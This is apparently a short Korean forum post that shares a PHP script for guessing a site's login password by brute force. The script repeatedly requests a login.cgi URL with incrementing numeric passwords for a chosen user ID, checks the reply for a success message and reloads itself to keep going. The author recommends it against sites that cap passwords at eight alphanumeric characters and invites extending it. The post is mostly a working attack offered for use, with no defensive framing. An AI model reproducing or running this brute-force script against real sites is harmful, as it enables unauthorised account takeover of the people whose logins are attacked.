사용자 ID,PW 알아내는 소스 (해킹 소스?)

사용자 ID,PW 알아내는 소스 (해킹 소스?)

소스는 너무 간단해서 설명은 드리지 않겠습니다.

주요 타겟 대상 사이트는 비번을 영숫자 8자 이하로 제한하는 곳을 공격하면 될 것입니다.
그런 사이트는 대부분 바로 뚤립니다. -.-;;;

응용력 소스를 조금 확장하셔도 좋을 듯....

 

<?

$id = 'YOUSERID';
if ($no < 1) {
          $no = $init * 1000;
}

$no ++;

$data = implode("\n", file("http://www.site.com/login.cgi?id=$id&pw=$no"));
if (ereg("로그인했을 때 특별한 메세지 비교", $data)) {
          echo "Bingo! The PW is $no<hr>";
}
else {
          echo "pw=$no<script>document.Location='$PHP_SELF?init=$init&no=$no';</script>";
}

?>